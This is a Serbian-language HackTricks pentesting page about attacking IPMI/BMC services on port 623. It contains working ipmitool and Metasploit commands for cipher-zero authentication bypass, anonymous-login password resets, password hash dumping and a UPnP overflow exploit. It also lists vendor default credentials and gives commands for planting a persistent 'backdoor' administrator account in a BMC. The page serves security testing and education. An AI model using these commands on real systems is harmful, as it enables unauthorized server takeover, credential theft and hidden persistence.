Serbian - Ht
HackTricks Training Twitter Linkedin Sponsor

623/UDP/TCP - IPMI

623/UDP/TCP - IPMI

Naučite hakovanje AWS-a od nule do heroja sa htARTE (HackTricks AWS Red Team Expert)!

Drugi načini podrške HackTricks-u:

Osnovne informacije

Pregled IPMI-ja

Inteligentni interfejs za upravljanje platformom (IPMI) nudi standardizovan pristup za daljinsko upravljanje i nadgledanje računarskih sistema, nezavisno od operativnog sistema ili stanja napajanja. Ova tehnologija omogućava sistem administratorima da upravljaju sistemima daljinski, čak i kada su isključeni ili neodzivni, i posebno je korisna za:

  • Konfiguracije pre pokretanja operativnog sistema

  • Upravljanje isključivanjem

  • Obnova nakon neuspeha sistema

IPMI je sposoban da nadgleda temperature, napon, brzinu ventilatora i napajanja, kao i da pruža informacije o inventaru, pregleda logove hardvera i šalje upozorenja putem SNMP-a. Za njegov rad su neophodni izvor napajanja i LAN veza.

Od svog predstavljanja od strane Intela 1998. godine, IPMI je podržan od strane brojnih prodavaca, poboljšavajući mogućnosti daljinskog upravljanja, posebno sa podrškom verzije 2.0 za serijski preko LAN-a. Ključni komponenti uključuju:

  • Baseboard Management Controller (BMC): Glavni mikrokontroler za IPMI operacije.

  • Komunikacione magistrale i interfejsi: Za internu i eksternu komunikaciju, uključujući ICMB, IPMB i različite interfejse za lokalne i mrežne veze.

  • IPMI memorija: Za skladištenje logova i podataka.

Podrazumevani port: 623/UDP/TCP (Obično se koristi UDP, ali može se koristiti i TCP)

Enumeracija

Otkrivanje

nmap -n -p 623 10.0.0./24
nmap -n-sU -p 623 10.0.0./24
use  auxiliary/scanner/ipmi/ipmi_version

Možete identifikovati verziju koristeći:

use auxiliary/scanner/ipmi/ipmi_version
nmap -sU --script ipmi-version -p 623 10.10.10.10

IPMI Ranjivosti

U domenu IPMI 2.0, otkrivena je značajna sigurnosna propustljivost od strane Dana Farmera, koja otkriva ranjivost putem šifarskog tipa 0. Ova ranjivost, detaljno dokumentovana na Dan Farmerovom istraživanju, omogućava neovlašćeni pristup sa bilo kojom lozinkom, pod uslovom da je ciljani korisnik validan. Ova slabost je pronađena na različitim BMC-ovima od proizvođača kao što su HP, Dell i Supermicro, što ukazuje na široko rasprostranjenu problematiku unutar svih implementacija IPMI 2.0.

IPMI Bypass autentifikacije putem šifre 0

Da biste otkrili ovu manu, možete koristiti sledeći Metasploit pomoćni skener:

use auxiliary/scanner/ipmi/ipmi_cipher_zero

Eksploatacija ove greške je moguća pomoću ipmitool-a, kao što je prikazano u nastavku, omogućavajući listanje i izmenu korisničkih lozinki:

apt-get install ipmitool # Installation command
ipmitool -I lanplus -C 0 -H 10.0.0.22 -U root -P root user list # Lists users
ipmitool -I lanplus -C 0 -H 10.0.0.22 -U root -P root user set password 2 abc123 # Changes password

IPMI 2.0 RAKP Autentifikacija - Preuzimanje udaljenog heša lozinke

Ova ranjivost omogućava preuzimanje soljenih heširanih lozinki (MD5 i SHA1) za bilo koji postojeći korisnički nalog. Da biste testirali ovu ranjivost, Metasploit nudi modul:

msf > use auxiliary/scanner/ipmi/ipmi_dumphashes

IPMI Anonimna Autentifikacija

Podrazumevana konfiguracija u mnogim BMC-ovima omogućava "anonimni" pristup, koji se karakteriše praznim korisničkim imenom i lozinkom. Ova konfiguracija može biti iskorišćena za resetovanje lozinki korisničkih naloga koji imaju imena koristeći ipmitool:

ipmitool -I lanplus -H 10.0.0.97 -U '' -P '' user list
ipmitool -I lanplus -H 10.0.0.97 -U '' -P '' user set password 2 newpassword

Supermicro IPMI lozinke u čistom tekstu

Kritičan dizajnerski izbor u IPMI 2.0 zahteva skladištenje lozinki u čistom tekstu unutar BMC-a u svrhu autentifikacije. Supermicro-ovo skladištenje ovih lozinki na lokacijama poput /nv/PSBlock ili /nv/PSStore izaziva značajne sigurnosne probleme:

cat /nv/PSBlock

Supermicro IPMI UPnP Vulnerabilnost

Uključivanje Supermicro UPnP SSDP slušača u IPMI firmware, posebno na UDP portu 1900, predstavlja ozbiljan sigurnosni rizik. Ranjivosti u Intel SDK za UPnP uređaje verzije 1.3.1, kako je detaljno opisano u Rapid7-ovom otkrivanju, omogućavaju pristup root nalogu BMC-a:

msf> use exploit/multi/upnp/libupnp_ssdp_overflow

Brute Force

HP nasumično generiše podrazumevanu lozinku za svoj proizvod Integrated Lights Out (iLO) tokom proizvodnje. Ova praksa se razlikuje od drugih proizvođača koji obično koriste statične podrazumevane akreditive. Pregled podrazumevanih korisničkih imena i lozinki za različite proizvode je sledeći:

  • HP Integrated Lights Out (iLO) koristi fabrički generisanu nisku od 8 karaktera kao podrazumevanu lozinku, što pokazuje veći nivo bezbednosti.

  • Proizvodi poput Dell-ovog iDRAC-a, IBM-ovog IMM-a i Fujitsu-ovog Integrated Remote Management Controller-a koriste lako pogodne lozinke poput "calvin", "PASSW0RD" (sa nulom) i "admin" redom.

  • Slično tome, Supermicro IPMI (2.0), Oracle/Sun ILOM i ASUS iKVM BMC takođe koriste jednostavne podrazumevane akreditive, pri čemu su njihove lozinke "ADMIN", "changeme" i "admin" redom.

Pristupanje Hostu putem BMC-a

Administrativni pristup Baseboard Management Controller-u (BMC) otvara različite puteve za pristup operativnom sistemu hosta. Jednostavan pristup uključuje iskorišćavanje funkcionalnosti BMC tastature, video zapisa i miša (KVM). To se može postići ili ponovnim pokretanjem hosta do root ljuske putem GRUB-a (korišćenjem init=/bin/sh) ili pokretanjem sa virtuelnog CD-ROM-a postavljenog kao spasilački disk. Ove metode omogućavaju direktno manipulisanje diskom hosta, uključujući umetanje zadnjih vrata, izvlačenje podataka ili bilo koje neophodne radnje za procenu bezbednosti. Međutim, to zahteva ponovno pokretanje hosta, što je značajan nedostatak. Bez ponovnog pokretanja, pristupanje pokrenutom hostu je složenije i razlikuje se u zavisnosti od konfiguracije hosta. Ako je fizička ili serijska konzola hosta ostala prijavljena, lako je preuzeti kontrolu putem BMC-ovih KVM ili serijsko-preko-LAN (sol) funkcionalnosti putem ipmitool-a. Istraživanje iskorišćavanja deljenih hardverskih resursa, poput i2c magistrale i Super I/O čipa, je oblast koja zahteva dalje istraživanje.

Uvođenje zadnjih vrata u BMC sa hosta

Nakon kompromitovanja hosta opremljenog BMC-om, lokalno BMC sučelje može se iskoristiti za umetanje korisničkog naloga zadnjih vrata, stvarajući trajno prisustvo na serveru. Ovaj napad zahteva prisustvo ipmitool-a na kompromitovanom hostu i aktivaciju podrške za BMC drajvere. Sledeće komande ilustruju kako se novi korisnički nalog može ubaciti u BMC koristeći lokalno sučelje hosta, što zaobilazi potrebu za autentifikacijom. Ova tehnika se može primeniti na širok spektar operativnih sistema, uključujući Linux, Windows, BSD i čak DOS.

ipmitool user list
ID  Name        Callin  Link Auth    IPMI Msg  Channel Priv Limit
2  ADMIN            true    false      false      Unknown (0x00)
3  root            true    false      false      Unknown (0x00)

ipmitool user set name 4 backdoor
ipmitool user set password 4 backdoor
ipmitool user priv 4 4
ipmitool user list
ID  Name        Callin  Link Auth    IPMI Msg  Channel Priv Limit
2  ADMIN            true    false      false      Unknown (0x00)
3  root            true    false      false      Unknown (0x00)
4  backdoor        true    false      true      ADMINISTRATOR

Shodan

  • port:623

Reference

Naučite hakovanje AWS-a od nule do heroja sa htARTE (HackTricks AWS Red Team Expert)!

Drugi načini podrške HackTricks-u:

Previous554,8554 - Pentesting RTSPNext631 - Internet Printing Protocol(IPP)

Last updated